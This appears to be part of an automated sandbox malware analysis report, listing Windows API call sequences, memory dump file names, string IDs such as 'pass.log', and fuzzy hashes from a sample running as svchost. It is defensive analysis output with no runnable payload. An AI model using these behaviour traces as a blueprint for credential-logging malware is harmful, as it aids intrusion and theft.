                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3485819771-0
                                                                                                                                                                                                              • Opcode ID: 70d749c9871dbd81f10e5fb4eb2794fcadf44d89eade6e36ed73b1cdb0f15832
                                                                                                                                                                                                              • Instruction ID: ddc10da6e7566f6ff1ca963189ca4bc5da328d9aa3752a34fdbd17ab44937864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70d749c9871dbd81f10e5fb4eb2794fcadf44d89eade6e36ed73b1cdb0f15832
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7431E435E41205AFCB10CF69DD84AAE7BBAAF89350B288969E8459B301DF31D851CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 45dd7c2275b50caefba27b45c70589f9afe3eef2c5af6d57391a894b7f498c83
                                                                                                                                                                                                              • Instruction ID: 6ace6573db549cf60c12e10d615b03518d170814a5d10b238b7f032f3b37ed6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45dd7c2275b50caefba27b45c70589f9afe3eef2c5af6d57391a894b7f498c83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1214BB1A40309AFDB10CF58DC90AAF77A8FF49310F140529FD8597340EBB1A9548BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 026652EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0266531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 02665338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 0266533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0266534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02665364
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              • Opcode ID: 05051f422226eb9e93b7eebb54bb53d0cccbda96a1595d10c37bec4215a6b72a
                                                                                                                                                                                                              • Instruction ID: 2fb95779a92185231552caa3fec11d5d940f14204ad6ed96b45ba18c13ff26c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05051f422226eb9e93b7eebb54bb53d0cccbda96a1595d10c37bec4215a6b72a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0118671B80309BBEB2095589C87FBE7768DB40F50F944915FB05FA1C0E6E1E491C6A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264BAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264BAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264BAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 0264BB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264BB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264BB2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675675969-0
                                                                                                                                                                                                              • Opcode ID: 72b2ffceec2aa945684010493945b6363106fa924f6c2405c70b72a61b65e86b
                                                                                                                                                                                                              • Instruction ID: 51c7cd6324ef8110fdb93aba28436b03d1787b0e16293f4da3c3ea7fdd0ff453
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72b2ffceec2aa945684010493945b6363106fa924f6c2405c70b72a61b65e86b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201F531E41210ABC7049F64FC08FDD37A0AF44728F965BA5E8429B281DFB198938F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264B92D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 0264B980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264B99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 0264B9AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699575883-0
                                                                                                                                                                                                              • Opcode ID: ab7a0f589076dc316c23de7aeedba5893b3578b57dd7db2b0a28f330af1bf6d6
                                                                                                                                                                                                              • Instruction ID: abb5b88e6d6dbb2edac63dce6cc5142a9caf6c383d4f752e633baeecac52de28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7a0f589076dc316c23de7aeedba5893b3578b57dd7db2b0a28f330af1bf6d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40017C74A85200BBD7148B20EC5DB9D37A0EB49319F825AA4F5169A280CBB154D18F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(0264CD24,00000000), ref: 0264CBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(0264CD24,000000F0), ref: 0264CC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(0264CD24,000000FA,?), ref: 0264CC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(0264CD24,000000FB,0000003C), ref: 0264CC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              • Opcode ID: 6d45fab383197e8da4b7a0628abc2bfcf65ef1aa32278dd75c30d97b73996606
                                                                                                                                                                                                              • Instruction ID: 3d435271f708307a348ad9e0666037667b35eaa31a1c3e3cc3e37e4f29c02cab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d45fab383197e8da4b7a0628abc2bfcf65ef1aa32278dd75c30d97b73996606
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1431C570902B05EFC724CF6AD584A5AFBF5BB48315B508A1EE49A93B61DB30F590CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF), ref: 0265B137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265B175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0265B1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: 8A99A6EF$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-3676434369
                                                                                                                                                                                                              • Opcode ID: b6c07e9bb19516e15fb79285758180b5ad66d7acc3928c0c0645656a116f42fe
                                                                                                                                                                                                              • Instruction ID: 3b951c36f48883192e476a9802d8bf1e1accad951cd1d67dc6de5beeff5c62a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c07e9bb19516e15fb79285758180b5ad66d7acc3928c0c0645656a116f42fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7112B309446989BCB218B28AD686FBBBE4EB86304F144AD5EDCAC7304EE718494C7C0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654230
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,02664081,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 0265424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              • Opcode ID: 6843b64a1c7606f52127a2b02bea0db966c02472176c03946a03c2a04d3b69fa
                                                                                                                                                                                                              • Instruction ID: 2ae7f937c839b8cd90786c7729e49c81b488810737c9973707528be3ced40d9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6843b64a1c7606f52127a2b02bea0db966c02472176c03946a03c2a04d3b69fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101FC77A4022177D71059A96C88F8B7A1CEFD0672F164321FE05C7380DE21845486F5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02664980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649AD
                                                                                                                                                                                                                • Part of subcall function 02664980: GetProcessTimes.KERNEL32(00000000,?,?,?,02657967,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649CA
                                                                                                                                                                                                                • Part of subcall function 02664980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649E2
                                                                                                                                                                                                                • Part of subcall function 02664980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02657967,00000000), ref: 026649F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,000002F0,00000000,00000000,02F844C8,02657AD4), ref: 02657828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02F844C8), ref: 02657869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02F844C8), ref: 02657879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              • Opcode ID: 4259cf8831e2e8157d837c9b51d645fef8c1782750e255811c1cff489c22f5d0
                                                                                                                                                                                                              • Instruction ID: a66a2ba6202b47369acb0be1557392c66c8b014ccac9b58666b64ff7c08f5359
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4259cf8831e2e8157d837c9b51d645fef8c1782750e255811c1cff489c22f5d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101FC32E81220BBD7216F959C48F6FBB58EFCCB72B624A29E94693200CB344850C7D0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,02651163,00001000,?,?), ref: 0265413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0265414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026543D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02654438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 026544DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265AACC
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265AAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02651A39), ref: 0265AB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02651A39), ref: 0265AB78
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265AB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02651A39), ref: 0265AB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026542A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 026542DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02654308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 026543AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026413DE
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02641446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02641498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,0265369B,00000000,00010108,?,00000000), ref: 0266522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02665264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0266528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,0265369B), ref: 026652A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 026652B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
APIs
• GetLastError.KERNEL32 ref: 02645962
• VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02645995
• VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 026459C1
• VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 026459E8
• SetLastError.KERNEL32(?), ref: 02645A04
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
